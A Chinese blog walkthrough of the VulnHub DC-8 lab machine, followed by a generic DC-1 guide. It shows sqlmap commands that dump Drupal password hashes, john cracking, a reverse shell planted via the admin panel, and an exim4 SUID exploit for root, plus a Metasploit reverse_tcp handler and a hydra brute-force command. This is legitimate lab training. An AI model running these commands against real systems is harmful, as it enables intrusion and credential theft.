vulnhub靶机渗透DC-8

靶机入侵——DC8

1、环境搭建

下载地址:http://www.vulnhub.com/entry/dc-8,367/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24

    ​ 192.168.80.137 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.137
    在这里插入图片描述
    ​ 发现开放了80、22端口

  • web端进一步信息收集

    通过wappalyzer 插件我们收集到站点的cms、中间件、语言等信息
    在这里插入图片描述

3、漏洞挖掘与利用

  • 在翻看网站页时,发现可能存在SQL注入漏洞,经过单引号测试,发现确实存在。
    在这里插入图片描述

  • 使用sqlmap工具进行SQL注入攻击:

    获得库名:

    sqlmap -u http://192.168.80.137/?nid=2* --dbs --tamper=space2comment --leve 3
    在这里插入图片描述

    获得表名:猜测网站用户数据在d7db数据库中

    sqlmap -u http://192.168.80.137/?nid=2* -D d7db --tables
    在这里插入图片描述
    发现用户表:user,查看其字段

sqlmap -u http://192.168.80.137/?nid=2* -D d7db -T users --columns
在这里插入图片描述

发现用户及密码字段,查看字段。获得账户及密码密文

sqlmap -u http://192.168.80.137/?nid=2* -D d7db -T users -C name,pass --dump
在这里插入图片描述

  • 可以尝试使用john暴力破解密文,将密文保存到pass.txt

    john --wordlist=/usr/share/john/password.lst --rules pass.txt

    先破解john用户的密码,因为一般情况非管理员的密文爆破有更大概率

    得到结果为 turtle

  • 先尝试使用john用户登录后台寻找突破口,若不能成功,则继续爆破admin用户

  • 尝试ssh登录时,发现需要秘钥。

  • 扫描网站目录,发现登录界面:dirsearch -u http://192.168.80.137/ -e* -i 200
    在这里插入图片描述

  • 使用john登录
    在这里插入图片描述

  • 后台寻找利用点 ,写入反弹命令。
    在这里插入图片描述

    写入命令
    在这里插入图片描述

    提交表单,加载含反弹命令的页面。
    在这里插入图片描述

  • 提交成功,触发反弹
    在这里插入图片描述
    在这里插入图片描述

  • 使用python获得交互式shell

    python -c ‘import pty; pty.spawn(“/bin/bash”)’

4、提权

  • 尝试免密使用的root级别命令进行提权:sudo -l 。但是执行命令需要当前用户密码。

  • 尝试SUID提权:find / -perm -4000 -print 2>/dev/null

    或者:find / -perm -u=s -type f 2>/dev/null
    在这里插入图片描述

  • 发现exim4具有suid,查看版本号,再收集对应的提权模块
    在这里插入图片描述

  • 搜索利用模块, searchsploit exim 4
    在这里插入图片描述

  • 将脚本下载到靶机,当其他目录没有写权限时,记得进入/tmp目录下载

    查看使用方法
    在这里插入图片描述
    在这里插入图片描述

    下载,添加权限,执行
    在这里插入图片描述
    利用使用说明执行命令提权,发现./46996.sh -m setuid不行,./46996.sh -m netcat可以

  • 成功提权,获得flag
    在这里插入图片描述
    在这里插入图片描述

### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值